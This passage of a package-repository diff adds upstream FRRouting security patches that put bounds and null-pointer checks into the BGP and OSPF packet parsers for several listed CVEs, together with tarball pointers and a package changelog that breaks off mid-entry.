b/0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch @@ -0,0 +1,58 @@ +From 6979aa1574167121e260120504c77b47bb25230e Mon Sep 17 00:00:00 2001 +From: Donald Sharp +Date: Fri, 3 Mar 2023 21:58:33 -0500 +Subject: [PATCH] bgpd: Fix use beyond end of stream of labeled unicast parsing +Upstream: yes +CVE-2023-38407,bsc#1216899,https://github.com/FRRouting/frr/pull/12956/commits/ab362eae68edec12c175d9bc488bcc3f8b73d36f + +Fixes a couple crashes associated with attempting to read +beyond the end of the stream. + +Reported-by: Iggy Frankovic +Signed-off-by: Donald Sharp +(cherry picked from commit 7404a914b0cafe046703c8381903a80d3def8f8b) +Signed-off-by: Marius Tomaschewski + +diff --git a/bgpd/bgp_label.c b/bgpd/bgp_label.c +index 38f34a8927..64d1ff70ca 100644 +--- a/bgpd/bgp_label.c ++++ b/bgpd/bgp_label.c +@@ -312,6 +312,9 @@ static int bgp_nlri_get_labels(struct peer *peer, uint8_t *pnt, uint8_t plen, + uint8_t llen = 0; + uint8_t label_depth = 0; + ++ if (plen < BGP_LABEL_BYTES) ++ return 0; ++ + for (; data < lim; data += BGP_LABEL_BYTES) { + memcpy(label, data, BGP_LABEL_BYTES); + llen += BGP_LABEL_BYTES; +@@ -374,6 +377,9 @@ int bgp_nlri_parse_label(struct peer *peer, struct attr *attr, + memcpy(&addpath_id, pnt, BGP_ADDPATH_ID_LEN); + addpath_id = ntohl(addpath_id); + pnt += BGP_ADDPATH_ID_LEN; ++ ++ if (pnt >= lim) ++ return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW; + } + + /* Fetch prefix length. */ +@@ -392,6 +398,15 @@ int bgp_nlri_parse_label(struct peer *peer, struct attr *attr, + + /* Fill in the labels */ + llen = bgp_nlri_get_labels(peer, pnt, psize, &label); ++ if (llen == 0) { ++ flog_err( ++ EC_BGP_UPDATE_RCV, ++ "%s [Error] Update packet error (wrong label length 0)", ++ peer->host); ++ bgp_notify_send(peer, BGP_NOTIFY_UPDATE_ERR, ++ BGP_NOTIFY_UPDATE_INVAL_NETWORK); ++ return BGP_NLRI_PARSE_ERROR_LABEL_LENGTH; ++ } + p.prefixlen = prefixlen - BSIZE(llen); + + /* There needs to be at least one label */ +-- +2.35.3 + diff --git a/0018-bgpd-Flowspec-overflow-issue.patch b/0018-bgpd-Flowspec-overflow-issue.patch new file mode 100644 index 0000000..7081c2e --- /dev/null +++ b/0018-bgpd-Flowspec-overflow-issue.patch @@ -0,0 +1,37 @@ +From d4ead6bc0b2f0d4682661837d202502127060476 Mon Sep 17 00:00:00 2001 +From: Donald Sharp +Date: Thu, 23 Feb 2023 13:29:32 -0500 +Subject: [PATCH] bgpd: Flowspec overflow issue +Upstream: yes +CVE-2023-38406,bsc#1216900,https://github.com/FRRouting/frr/pull/12884/commits/0b999c886e241c52bd1f7ef0066700e4b618ebb3 + +According to the flowspec RFC 8955 a flowspec nlri is > +Specifying 0 as a length makes BGP get all warm on the inside. Which +in this case is not a good thing at all. Prevent warmth, stay cold +on the inside. + +Reported-by: Iggy Frankovic +Signed-off-by: Donald Sharp +Signed-off-by: Marius Tomaschewski + +diff --git a/bgpd/bgp_flowspec.c b/bgpd/bgp_flowspec.c +index fe1f0d50f8..98ec1ed073 100644 +--- a/bgpd/bgp_flowspec.c ++++ b/bgpd/bgp_flowspec.c +@@ -148,6 +148,13 @@ int bgp_nlri_parse_flowspec(struct peer *peer, struct attr *attr, + psize); + return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW; + } ++ ++ if (psize == 0) { ++ flog_err(EC_BGP_FLOWSPEC_PACKET, ++ "Flowspec NLRI length 0 which makes no sense"); ++ return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW; ++ } ++ + if (bgp_fs_nlri_validate(pnt, psize, afi) < 0) { + flog_err( + EC_BGP_FLOWSPEC_PACKET, +-- +2.35.3 + diff --git a/0019-bgpd-fix-error-handling-when-receiving-BGP-Prefix-SID-attribute.patch b/0019-bgpd-fix-error-handling-when-receiving-BGP-Prefix-SID-attribute.patch new file mode 100644 index 0000000..624015b --- /dev/null +++ b/0019-bgpd-fix-error-handling-when-receiving-BGP-Prefix-SID-attribute.patch @@ -0,0 +1,121 @@ +From 51679e4504546584d98673b76ed8e12a8bc74fe0 Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis +Date: Wed, 27 Mar 2024 18:42:56 +0200 +Subject: [PATCH 1/2] bgpd: Fix error handling when receiving BGP Prefix SID + attribute +References: bsc#1222518 CVE-2024-31948 gh#FRRouting/frr#15628 + + +Without this patch, we always set the BGP Prefix SID attribute flag without +checking if it's malformed or not. RFC8669 says that this attribute MUST be discarded. + +Also, this fixes the bgpd crash when a malformed Prefix SID attribute is received, +with malformed transitive flags and/or TLVs. + +Reported-by: Iggy Frankovic +Signed-off-by: Donatas Abraitis +(cherry picked from commit ba6a8f1a31e1a88df2de69ea46068e8bd9b97138) +--- + bgpd/bgp_attr.c | 5 +++-- + 1 file changed, 3 insertions(+), 2 deletions(-) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index 7144c4bfa73d..2e2845b8fa7e 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -1400,6 +1400,7 @@ bgp_attr_malformed(struct bgp_attr_parser_args *args, uint8_t subcode, + case BGP_ATTR_AS4_AGGREGATOR: + case BGP_ATTR_AGGREGATOR: + case BGP_ATTR_ATOMIC_AGGREGATE: ++ case BGP_ATTR_PREFIX_SID: + return BGP_ATTR_PARSE_PROCEED; + + /* Core attributes, particularly ones which may influence route +@@ -3146,8 +3147,6 @@ enum bgp_attr_parse_ret bgp_attr_prefix_sid(struct bgp_attr_parser_args *args) + struct attr *const attr = args->attr; + enum bgp_attr_parse_ret ret; + +- attr->flag |= ATTR_FLAG_BIT(BGP_ATTR_PREFIX_SID); +- + uint8_t type; + uint16_t length; + size_t headersz = sizeof(type) + sizeof(length); +@@ -3197,6 +3196,8 @@ enum bgp_attr_parse_ret bgp_attr_prefix_sid(struct bgp_attr_parser_args *args) + } + } + ++ SET_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_PREFIX_SID)); ++ + return BGP_ATTR_PARSE_PROCEED; + } + + +From 9240abccb564043c85180916b77cad5b194a49c9 Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis +Date: Wed, 27 Mar 2024 19:08:38 +0200 +Subject: [PATCH 2/2] bgpd: Prevent from one more CVE triggering this place +References: bsc#1222518 CVE-2024-31948 gh#FRRouting/frr#15628 +Upstream: submitted + +If we receive an attribute that is handled by bgp_attr_malformed(), use +treat-as-withdraw behavior for unknown (or missing to add - if new) attributes. + +Signed-off-by: Donatas Abraitis +(cherry picked from commit babb23b74855e23c987a63f8256d24e28c044d07) +--- + bgpd/bgp_attr.c | 33 ++++++++++++++++++++++----------- + 1 file changed, 22 insertions(+), 11 deletions(-) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index 2e2845b8fa7e..7570598a3d7f 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -1391,6 +1391,15 @@ bgp_attr_malformed(struct bgp_attr_parser_args *args, uint8_t subcode, + (args->startp - STREAM_DATA(BGP_INPUT(peer))) + + args->total); + ++ /* Partial optional attributes that are malformed should not cause ++ * the whole session to be reset. Instead treat it as a withdrawal ++ * of the routes, if possible. ++ */ ++ if (CHECK_FLAG(flags, BGP_ATTR_FLAG_TRANS) && ++ CHECK_FLAG(flags, BGP_ATTR_FLAG_OPTIONAL) && ++ CHECK_FLAG(flags, BGP_ATTR_FLAG_PARTIAL)) ++ return BGP_ATTR_PARSE_WITHDRAW; ++ + switch (args->type) { + /* where an attribute is relatively inconsequential, e.g. it does not + * affect route selection, and can be safely ignored, then any such +@@ -1425,19 +1434,21 @@ bgp_attr_malformed(struct bgp_attr_parser_args *args, uint8_t subcode, + bgp_notify_send_with_data(peer, BGP_NOTIFY_UPDATE_ERR, subcode, + notify_datap, length); + return BGP_ATTR_PARSE_ERROR; ++ default: ++ /* Unknown attributes, that are handled by this function ++ * should be treated as withdraw, to prevent one more CVE ++ * from being introduced. ++ * RFC 7606 says: ++ * The "treat-as-withdraw" approach is generally preferred ++ * and the "session reset" approach is discouraged. ++ */ ++ flog_err(EC_BGP_ATTR_FLAG, ++ "%s(%u) attribute received, while it is not known how to handle it, treating as withdraw", ++ lookup_msg(attr_str, args->type, NULL), args->type); ++ break; + } + +- /* Partial optional attributes that are malformed should not cause +- * the whole session to be reset. Instead treat it as a withdrawal +- * of the routes, if possible. +- */ +- if (CHECK_FLAG(flags, BGP_ATTR_FLAG_TRANS) +- && CHECK_FLAG(flags, BGP_ATTR_FLAG_OPTIONAL) +- && CHECK_FLAG(flags, BGP_ATTR_FLAG_PARTIAL)) +- return BGP_ATTR_PARSE_WITHDRAW; +- +- /* default to reset */ +- return BGP_ATTR_PARSE_ERROR_NOTIFYPLS; ++ return BGP_ATTR_PARSE_WITHDRAW; + } + + /* Find out what is wrong with the path attribute flag bits and log the error. diff --git a/0020-ospfd-Solved-crash-in-OSPF-TE-parsing.patch b/0020-ospfd-Solved-crash-in-OSPF-TE-parsing.patch new file mode 100644 index 0000000..2c1979e --- /dev/null +++ b/0020-ospfd-Solved-crash-in-OSPF-TE-parsing.patch @@ -0,0 +1,37 @@ +From 285c19a3c665087720e1fea7d8d944c961c52288 Mon Sep 17 00:00:00 2001 +From: Olivier Dugeon +Date: Mon, 26 Feb 2024 10:40:34 +0100 +Subject: [PATCH] ospfd: Solved crash in OSPF TE parsing +Upstream: yes +References: bsc#1220548, CVE-2024-27913, gh#FRRouting/frr#15431 + +Iggy Frankovic discovered an ospfd crash when perfomring fuzzing of OSPF LSA +packets. The crash occurs in ospf_te_parse_te() function when attemping to +create corresponding egde from TE Link parameters. If there is no local +address, an edge is created but without any attributes. During parsing, the +function try to access to this attribute fields which has not been created +causing an ospfd crash. + +The patch simply check if the te parser has found a valid local address. If not +found, we stop the parser which avoid the crash. + +Signed-off-by: Olivier Dugeon + +diff --git a/ospfd/ospf_te.c b/ospfd/ospf_te.c +index 75f4e0c9f0..45eb205759 100644 +--- a/ospfd/ospf_te.c ++++ b/ospfd/ospf_te.c +@@ -2276,6 +2276,10 @@ static int ospf_te_parse_te(struct ls_ted *ted, struct ospf_lsa *lsa) + } + + /* Get corresponding Edge from Link State Data Base */ ++ if (IPV4_NET0(attr.standard.local.s_addr) && !attr.standard.local_id) { ++ ote_debug(" |- Found no TE Link local address/ID. Abort!"); ++ return -1; ++ } + edge = get_edge(ted, attr.adv, attr.standard.local); + old = edge->attributes; + +-- +2.35.3 + diff --git a/0021-ospfd-Solved-crash-in-RI-parsing-with-OSPF-TE.patch b/0021-ospfd-Solved-crash-in-RI-parsing-with-OSPF-TE.patch new file mode 100644 index 0000000..09ff0a3 --- /dev/null +++ b/0021-ospfd-Solved-crash-in-RI-parsing-with-OSPF-TE.patch @@ -0,0 +1,67 @@ +From 298704f1e73221172432e2a4afd79086ffcd4cca Mon Sep 17 00:00:00 2001 +From: Olivier Dugeon +Date: Wed, 3 Apr 2024 16:28:23 +0200 +Upstream: yes +References: CVE-2024-31950,bsc#1222526,gh#FRRouting/frr#16088 +Subject: [PATCH 1/3] ospfd: Solved crash in RI parsing with OSPF TE + +Iggy Frankovic discovered another ospfd crash when performing fuzzing of OSPF +LSA packets. The crash occurs in ospf_te_parse_ri() function when attemping to +read Segment Routing subTLVs. The original code doesn't check if the size of +the SR subTLVs have the correct length. In presence of erronous LSA, this will +cause a buffer overflow and ospfd crash. + +This patch introduces new verification of the subTLVs size for Router +Information TLV. + +Co-authored-by: Iggy Frankovic +Signed-off-by: Olivier Dugeon +(cherry picked from commit f69d1313b19047d3d83fc2b36a518355b861dfc4) +--- + ospfd/ospf_te.c | 9 +++++++++ + 1 file changed, 9 insertions(+) + +diff --git a/ospfd/ospf_te.c b/ospfd/ospf_te.c +index 45eb205759..885b915585 100644 +--- a/ospfd/ospf_te.c ++++ b/ospfd/ospf_te.c +@@ -2483,6 +2483,9 @@ static int ospf_te_parse_ri(struct ls_ted *ted, struct ospf_lsa *lsa) + + switch (ntohs(tlvh->type)) { + case RI_SR_TLV_SR_ALGORITHM: ++ if (TLV_BODY_SIZE(tlvh) < 1 || ++ TLV_BODY_SIZE(tlvh) > ALGORITHM_COUNT) ++ break; + algo = (struct ri_sr_tlv_sr_algorithm *)tlvh; + + for (int i = 0; i < ntohs(algo->header.length); i++) { +@@ -2507,6 +2510,8 @@ static int ospf_te_parse_ri(struct ls_ted *ted, struct ospf_lsa *lsa) + break; + + case RI_SR_TLV_SRGB_LABEL_RANGE: ++ if (TLV_BODY_SIZE(tlvh) != RI_SR_TLV_LABEL_RANGE_SIZE) ++ break; + range = (struct ri_sr_tlv_sid_label_range *)tlvh; + size = GET_RANGE_SIZE(ntohl(range->size)); + lower = GET_LABEL(ntohl(range->lower.value)); +@@ -2524,6 +2529,8 @@ static int ospf_te_parse_ri(struct ls_ted *ted, struct ospf_lsa *lsa) + break; + + case RI_SR_TLV_SRLB_LABEL_RANGE: ++ if (TLV_BODY_SIZE(tlvh) != RI_SR_TLV_LABEL_RANGE_SIZE) ++ break; + range = (struct ri_sr_tlv_sid_label_range *)tlvh; + size = GET_RANGE_SIZE(ntohl(range->size)); + lower = GET_LABEL(ntohl(range->lower.value)); +@@ -2541,6 +2548,8 @@ static int ospf_te_parse_ri(struct ls_ted *ted, struct ospf_lsa *lsa) + break; + + case RI_SR_TLV_NODE_MSD: ++ if (TLV_BODY_SIZE(tlvh) < RI_SR_TLV_NODE_MSD_SIZE) ++ break; + msd = (struct ri_sr_tlv_node_msd *)tlvh; + if ((CHECK_FLAG(node->flags, LS_NODE_MSD)) + && (node->msd == msd->value)) +-- +2.35.3 + diff --git a/0022-ospfd-Correct-Opaque-LSA-Extended-parser.patch b/0022-ospfd-Correct-Opaque-LSA-Extended-parser.patch new file mode 100644 index 0000000..2e2a40a --- /dev/null +++ b/0022-ospfd-Correct-Opaque-LSA-Extended-parser.patch @@ -0,0 +1,109 @@ +From 4e70b09f24b72fbb27ff5eda63393bfd2a72ef37 Mon Sep 17 00:00:00 2001 +From: Olivier Dugeon +Date: Fri, 5 Apr 2024 12:57:11 +0200 +Upstream: yes +References: CVE-2024-31951,bsc#1222528,gh#FRRouting/frr#16088 +Subject: [PATCH 2/3] ospfd: Correct Opaque LSA Extended parser + +Iggy Frankovic discovered another ospfd crash when performing fuzzing of OSPF +LSA packets. The crash occurs in ospf_te_parse_ext_link() function when +attemping to read Segment Routing Adjacency SID subTLVs. The original code +doesn't check if the size of the Extended Link TLVs and subTLVs have the correct +length. In presence of erronous LSA, this will cause a buffer overflow and ospfd +crashes. + +This patch introduces new verification of the subTLVs size for Extended Link +TLVs and subTLVs. Similar check has been also introduced for the Extended +Prefix TLV. + +Co-authored-by: Iggy Frankovic +Signed-off-by: Olivier Dugeon +(cherry picked from commit 5557a289acdaeec8cc63ffc97b5c2abf6dee7b3a) +--- + ospfd/ospf_te.c | 35 +++++++++++++++++++++++++++++++++-- + 1 file changed, 33 insertions(+), 2 deletions(-) + +diff --git a/ospfd/ospf_te.c b/ospfd/ospf_te.c +index 885b915585..23a1b181ec 100644 +--- a/ospfd/ospf_te.c ++++ b/ospfd/ospf_te.c +@@ -2647,6 +2647,7 @@ static int ospf_te_parse_ext_pref(struct ls_ted *ted, struct ospf_lsa *lsa) + struct ext_tlv_prefix *ext; + struct ext_subtlv_prefix_sid *pref_sid; + uint32_t label; ++ uint16_t len, size; + + /* Get corresponding Subnet from Link State Data Base */ + ext = (struct ext_tlv_prefix *)TLV_HDR_TOP(lsa->data); +@@ -2668,6 +2669,18 @@ static int ospf_te_parse_ext_pref(struct ls_ted *ted, struct ospf_lsa *lsa) + ote_debug(" |- Process Extended Prefix LSA %pI4 for subnet %pFX", + &lsa->data->id, &pref); + ++ /* ++ * Check Extended Prefix TLV size against LSA size ++ * as only one TLV is allowed per LSA ++ */ ++ len = TLV_BODY_SIZE(&ext->header); ++ size = lsa->size - (OSPF_LSA_HEADER_SIZE + TLV_HDR_SIZE); ++ if (len != size || len <= 0) { ++ ote_debug(" |- Wrong TLV size: %u instead of %u", ++ (uint32_t)len, (uint32_t)size); ++ return -1; ++ } ++ + /* Initialize TLV browsing */ + ls_pref = subnet->ls_pref; + pref_sid = (struct ext_subtlv_prefix_sid *)((char *)(ext) + TLV_HDR_SIZE +@@ -2778,8 +2791,20 @@ static int ospf_te_parse_ext_link(struct ls_ted *ted, struct ospf_lsa *lsa) + ote_debug(" |- Process Extended Link LSA %pI4 for edge %pI4", + &lsa->data->id, &edge->attributes->standard.local); + +- /* Initialize TLV browsing */ +- len = TLV_BODY_SIZE(&ext->header) - EXT_TLV_LINK_SIZE; ++ /* ++ * Check Extended Link TLV size against LSA size ++ * as only one TLV is allowed per LSA ++ */ ++ len = TLV_BODY_SIZE(&ext->header); ++ i = lsa->size - (OSPF_LSA_HEADER_SIZE + TLV_HDR_SIZE); ++ if (len != i || len <= 0) { ++ ote_debug(" |- Wrong TLV size: %u instead of %u", ++ (uint32_t)len, (uint32_t)i); ++ return -1; ++ } ++ ++ /* Initialize subTLVs browsing */ ++ len -= EXT_TLV_LINK_SIZE; + tlvh = (struct tlv_header *)((char *)(ext) + TLV_HDR_SIZE + + EXT_TLV_LINK_SIZE); + for (; sum < len; tlvh = TLV_HDR_NEXT(tlvh)) { +@@ -2789,6 +2814,8 @@ static int ospf_te_parse_ext_link(struct ls_ted *ted, struct ospf_lsa *lsa) + + switch (ntohs(tlvh->type)) { + case EXT_SUBTLV_ADJ_SID: ++ if (TLV_BODY_SIZE(tlvh) != EXT_SUBTLV_ADJ_SID_SIZE) ++ break; + adj = (struct ext_subtlv_adj_sid *)tlvh; + label = CHECK_FLAG(adj->flags, + EXT_SUBTLV_LINK_ADJ_SID_VFLG) +@@ -2815,6 +2842,8 @@ static int ospf_te_parse_ext_link(struct ls_ted *ted, struct ospf_lsa *lsa) + + break; + case EXT_SUBTLV_LAN_ADJ_SID: ++ if (TLV_BODY_SIZE(tlvh) != EXT_SUBTLV_LAN_ADJ_SID_SIZE) ++ break; + ladj = (struct ext_subtlv_lan_adj_sid *)tlvh; + label = CHECK_FLAG(ladj->flags, + EXT_SUBTLV_LINK_ADJ_SID_VFLG) +@@ -2844,6 +2873,8 @@ static int ospf_te_parse_ext_link(struct ls_ted *ted, struct ospf_lsa *lsa) + + break; + case EXT_SUBTLV_RMT_ITF_ADDR: ++ if (TLV_BODY_SIZE(tlvh) != EXT_SUBTLV_RMT_ITF_ADDR_SIZE) ++ break; + rmt = (struct ext_subtlv_rmt_itf_addr *)tlvh; + if (CHECK_FLAG(atr->flags, LS_ATTR_NEIGH_ADDR) + && IPV4_ADDR_SAME(&atr->standard.remote, +-- +2.35.3 + diff --git a/0023-ospfd-protect-call-to-get_edge-in-ospf_te.c.patch b/0023-ospfd-protect-call-to-get_edge-in-ospf_te.c.patch new file mode 100644 index 0000000..e6073bf --- /dev/null +++ b/0023-ospfd-protect-call-to-get_edge-in-ospf_te.c.patch @@ -0,0 +1,82 @@ +From cef38442420aeac8e163f8aa55f1b985908f993c Mon Sep 17 00:00:00 2001 +From: Olivier Dugeon +Date: Tue, 16 Apr 2024 16:42:06 +0200 +Upstream: yes +References: CVE-2024-34088,bsc#1223786,gh#FRRouting/frr#16088 +Subject: [PATCH 3/3] ospfd: protect call to get_edge() in ospf_te.c + +During fuzzing, Iggy Frankovic discovered that get_edge() function in ospf_te.c +could return null pointer, in particular when the link_id or advertised router +IP addresses are fuzzed. As the null pointer returned by get_edge() function is +not handlei by calling functions, this could cause ospfd crash. + +This patch introduces new verification of returned pointer by get_edge() +function and stop the processing in case of null pointer. In addition, link ID +and advertiser router ID are validated before calling ls_find_edge_by_key() to +avoid the creation of a new edge with an invalid key. + +CVE-2024-34088 + +Co-authored-by: Iggy Frankovic +Signed-off-by: Olivier Dugeon +(cherry picked from commit 8c177d69e32b91b45bda5fc5da6511fa03dc11ca) +--- + ospfd/ospf_te.c | 19 ++++++++++++++++--- + 1 file changed, 16 insertions(+), 3 deletions(-) + +diff --git a/ospfd/ospf_te.c b/ospfd/ospf_te.c +index 23a1b181ec..d1f114e30a 100644 +--- a/ospfd/ospf_te.c ++++ b/ospfd/ospf_te.c +@@ -1686,6 +1686,11 @@ static struct ls_edge *get_edge(struct ls_ted *ted, struct ls_node_id adv, + struct ls_edge *edge; + struct ls_attributes *attr; + ++ /* Check that Link ID and Node ID are valid */ ++ if (IPV4_NET0(link_id.s_addr) || IPV4_NET0(adv.id.ip.addr.s_addr) || ++ adv.origin != OSPFv2) ++ return NULL; ++ + /* Search Edge that corresponds to the Link ID */ + key = ((uint64_t)ntohl(link_id.s_addr)) & 0xffffffff; + edge = ls_find_edge_by_key(ted, key); +@@ -1758,6 +1763,10 @@ static void ospf_te_update_link(struct ls_ted *ted, struct ls_vertex *vertex, + + /* Get Corresponding Edge from Link State Data Base */ + edge = get_edge(ted, vertex->node->adv, link_data); ++ if (!edge) { ++ ote_debug(" |- Found no edge from Link Data. Abort!"); ++ return; ++ } + attr = edge->attributes; + + /* re-attached edge to vertex if needed */ +@@ -2276,11 +2285,11 @@ static int ospf_te_parse_te(struct ls_ted *ted, struct ospf_lsa *lsa) + } + + /* Get corresponding Edge from Link State Data Base */ +- if (IPV4_NET0(attr.standard.local.s_addr) && !attr.standard.local_id) { +- ote_debug(" |- Found no TE Link local address/ID. Abort!"); ++ edge = get_edge(ted, attr.adv, attr.standard.local); ++ if (!edge) { ++ ote_debug(" |- Found no edge from Link local add./ID. Abort!"); + return -1; + } +- edge = get_edge(ted, attr.adv, attr.standard.local); + old = edge->attributes; + + ote_debug(" |- Process Traffic Engineering LSA %pI4 for Edge %pI4", +@@ -2786,6 +2795,10 @@ static int ospf_te_parse_ext_link(struct ls_ted *ted, struct ospf_lsa *lsa) + lnid.id.ip.area_id = lsa->area->area_id; + ext = (struct ext_tlv_link *)TLV_HDR_TOP(lsa->data); + edge = get_edge(ted, lnid, ext->link_data); ++ if (!edge) { ++ ote_debug(" |- Found no edge from Extended Link Data. Abort!"); ++ return -1; ++ } + atr = edge->attributes; + + ote_debug(" |- Process Extended Link LSA %pI4 for edge %pI4", +-- +2.35.3 + diff --git a/frr-10.0.1.tar.gz b/frr-10.0.1.tar.gz new file mode 100644 index 0000000..1eee213 --- /dev/null +++ b/frr-10.0.1.tar.gz @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:56ea357c56ea55e19101fcf9824252c45ab3b6b419a7a29ead8028c96863e0e2 +size 10963132 diff --git a/frr-10.0.2.tar.gz b/frr-10.0.2.tar.gz new file mode 100644 index 0000000..d093816 --- /dev/null +++ b/frr-10.0.2.tar.gz @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f8cac2f3c9184d2392d1cd6fd9ea08c1e838d3b1fa633ea8845f01ed0fac50b3 +size 10968487 diff --git a/frr-8.4.tar.gz b/frr-8.4.tar.gz new file mode 100644 index 0000000..cdfba41 --- /dev/null +++ b/frr-8.4.tar.gz @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4fe5dccf6d41218c3012c2b09c85c4cd65a96299ab400e487191515232f0ee8a +size 9883194 diff --git a/frr-tmpfiles.d b/frr-tmpfiles.d new file mode 100644 index 0000000..719f4b9 --- /dev/null +++ b/frr-tmpfiles.d @@ -0,0 +1 @@ +d @frr_statedir@ 0751 frr frrvty diff --git a/frr.changes b/frr.changes new file mode 100644 index 0000000..6cde8bf --- /dev/null +++ b/frr.changes @@ -0,0 +1,510 @@ +------------------------------------------------------------------- +Mon Sep 30 09:49:59 UTC 2024 - Marius Tomaschewski + +- Update to frr 10.0.2 release providing fix for CVE-2024-44070 + and other issues, see https://frrouting.org/release/10.0.2/ +- Removed patch included in the sources: + [- 0002-bgpd-Check-the-actual-remaining-stream-length-before.patch] + +------------------------------------------------------------------- +Mon Sep 16 16:36:31 UTC 2024 - Marius Tomaschewski + +- add release notes url to 10.0.1 update + +------------------------------------------------------------------- +Mon Sep 16 11:31:12 UTC 2024 - Marius Tomaschewski + +- fixed bug/pull request references in frr.changes file + +------------------------------------------------------------------- +Thu Aug 22 13:02:19 UTC 2024 - Marius Tomaschewski + +- Apply upstream fix for crash in bgp_attr_encap that were missing + a check of the actual remaining stream length before taking the + TLV value (CVE-2024-44070,bsc#1229438,gh#FRRouting/frr#16502): + + 0002-bgpd-Check-the-actual-remaining-stream-length-before.patch +- Re-added 0001-disable-zmq-test.patch to avoid (sporadic or arch + specific, e.g. aarch64) "make check" test failures (bsc#1180217). + + 0001-disable-zmq-test.patch +- Re-added hardening patch for systemd service(s) (bsc#1181400): + + harden_frr.service.patch +- Cleanup unknown --enable-systemd and correct the --sysconfdir + and --localstatedir configure options to not end in …/frr. + +------------------------------------------------------------------- +Fri Aug 9 14:14:10 UTC 2024 - Erico Mendonca + +- Fixing Source URL/archive name. + +------------------------------------------------------------------- +Sun Jul 28 20:21:43 UTC 2024 - Erico Mendonca + +- Update to version 10.0.1 from official sources. + See https://frrouting.org/release/10.0.1/ +- Clean slate: removing all previous patches. +- The following patches were obsoleted: + - 0001-disable-zmq-test.patch + - harden_frr.service.patch + - 0003-tools-Run-as-FRR_USER-install-chown-commands-to-avoi.patch + - 0004-tools-remove-backslash-from-declare-check-regex.patch + - 0005-root-ok-in-account-frr.pam.patch + - 0006-bgpd-Check-7-bytes-for-Long-lived-Graceful-Restart-c.patch + - 0007-bgpd-Ensure-stream-received-has-enough-data.patch + - 0008-bgpd-Don-t-read-the-first-byte-of-ORF-header-if-we-a.patch + - 0009-bgpd-Do-not-process-NLRIs-if-the-attribute-length-is.patch + - 0010-bgpd-Use-treat-as-withdraw-for-tunnel-encapsulation-.patch + - 0011-babeld-fix-11808-to-avoid-infinite-loops.patch + - 0012-bgpd-Limit-flowspec-to-no-attribute-means-a-implicit.patch + - 0013-bgpd-Check-mandatory-attributes-more-carefully-for-U.patch + - 0014-bgpd-Handle-MP_REACH_NLRI-malformed-packets-with-ses.patch + - 0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch + - 0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch + - 0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch + - 0018-bgpd-Flowspec-overflow-issue.patch + - 0019-bgpd-fix-error-handling-when-receiving-BGP-Prefix-SID-attribute.patch + - 0020-ospfd-Solved-crash-in-OSPF-TE-parsing.patch + - 0021-ospfd-Solved-crash-in-RI-parsing-with-OSPF-TE.patch + - 0022-ospfd-Correct-Opaque-LSA-Extended-parser.patch + - 0023-ospfd-protect-call-to-get_edge-in-ospf_te.c.patch + +------------------------------------------------------------------- +Tue Jun 4 21:27:48 UTC 2024 - Marius Tomaschewski + +- Apply upstream fix solving ospfd denial of service via get_edge() + function returning a NULL pointer (CVE-2024-34088,bsc#1223786, + gh#FRRouting/frr#16088). + [+ 0023-ospfd-protect-call-to-get_edge-in-ospf_te.c.patch] +- Apply upstream fix solving ospfd buffer overflow and daemon crash + in ospf_te_parse_ext_link for OSPF LSA packets during an attempt + to read Segment Routing Adjacency SID subTLVs (CVE-2024-31951, + bsc#1222528,gh#FRRouting/frr#16088). + [+ 0022-ospfd-Correct-Opaque-LSA-Extended-parser.patch] +- Apply upstream fix solving ospfd buffer overflow and daemon crash + in RI parsing with OSPF TE (CVE-2024-31950,bsc#1222526, + gh#FRRouting/frr#16088). + [+ 0021-ospfd-Solved-crash-in-RI-parsing-with-OSPF-TE.patch] + +------------------------------------------------------------------- +Wed Apr 24 10:40:57 UTC 2024 - Marius Tomaschewski + +- Apply upstream fix solving crash in OSPF TE parsing (bsc#1220548, + CVE-2024-27913, gh#FRRouting/frr#15431) + [+ 0020-ospfd-Solved-crash-in-OSPF-TE-parsing.patch] + +------------------------------------------------------------------- +Wed Apr 10 18:59:00 UTC 2024 - Clemens Famulla-Conrad + +- add + 0019-bgpd-fix-error-handling-when-receiving-BGP-Prefix-SID-attribute.patch: + * Apply upstream fix on error handling when receiving BGP Prefix + SID attribute (bsc#1222518,CVE-2024-31948,gh#FRRouting/frr#15628) + +------------------------------------------------------------------- +Thu Feb 8 06:55:28 UTC 2024 - Dominique Leuenberger + +- Provide user/group symbol for user created during pre. + +------------------------------------------------------------------- +Fri Feb 2 08:25:36 UTC 2024 - Dominique Leuenberger + +- Fix build with RPM 4.19: a stray %-escape sequence was found in + the files section. + +------------------------------------------------------------------- +Mon Dec 4 09:11:46 UTC 2023 - Marius Tomaschewski + +- Apply upstream fix for a crash on malformed BGP UPDATE message + with an EOR, because the presence of EOR does not lead to a + treat-as-withdraw outcome (CVE-2023-47235,bsc#1216896,https://github.com/FRRouting/frr/pull/14716/commits/6814f2e0138a6ea5e1f83bdd9085d9a77999900b) + [+ 0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch] +- Apply upstream fix for a crash on crafted BGP UPDATE message with + a MP_UNREACH_NLRI attribute and additional NLRI data (CVE-2023-47234, + bsc#1216897,https://github.com/FRRouting/frr/pull/14716/commits/c37119df45bbf4ef713bc10475af2ee06e12f3bf) + [+ 0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch] +- Apply upstream fix for attempts to read beyond the end of the + stream during labeled unicast parsing (CVE-2023-38407,bsc#1216899,https://github.com/FRRouting/frr/pull/12956/commits/ab362eae68edec12c175d9bc488bcc3f8b73d36f) + [+ 